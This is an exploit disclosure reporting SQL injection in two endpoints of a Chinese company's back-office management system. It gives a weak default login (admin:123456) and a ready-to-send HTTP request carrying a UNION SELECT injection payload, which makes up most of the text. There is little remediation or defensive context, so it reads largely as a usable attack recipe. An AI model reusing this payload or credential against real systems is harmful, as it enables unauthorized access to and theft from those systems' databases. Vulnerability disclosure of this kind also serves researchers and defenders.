Exploit Title: SQL injection exists in the background management system /Default/Bd?id and /Default/Page?id of Shaoxing Punctuation Electronic Technology Co., LTD
Date: 2022-12/2
Exploit Author: Peanut886
Vendor Homepage: http://www.xsjczx.com/
Version: background management system of Shaoxing Punctuation Electronic Technology Co., LTD
Tested on: windows10 + phpstudy + burpsuite
Description
Weak password: admin:123456 SQL injection exists in the background management system /Default/Bd?id and /Default/Page?id of Shaoxing Punctuation Electronic Technology Co., LTD
Payload used:
GET /Default/Bd?id=-e7fa628182201505181659430599563%27union%20select%201,2,3,4,5,6,7%20--+ HTTP/1.1
Host: TARGET:PORT
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: ASP.NET_SessionId=pjcyha1p55kts5fkgesrgehn
Upgrade-Insecure-Requests: 1
Returns part of the package
